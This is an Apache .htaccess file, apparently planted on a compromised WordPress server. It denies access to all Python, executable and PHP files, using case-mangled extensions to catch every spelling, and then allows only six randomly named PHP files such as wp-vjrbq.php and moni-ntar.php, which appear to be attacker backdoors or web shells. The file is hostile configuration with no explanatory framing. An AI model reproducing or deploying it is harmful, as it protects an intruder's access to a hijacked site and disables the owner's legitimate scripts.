<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch "^(dnjdrp.php|duczka.php|wp-vjrbq.php|wp-kljuq.php|moni-cvjg.php|moni-ntar.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
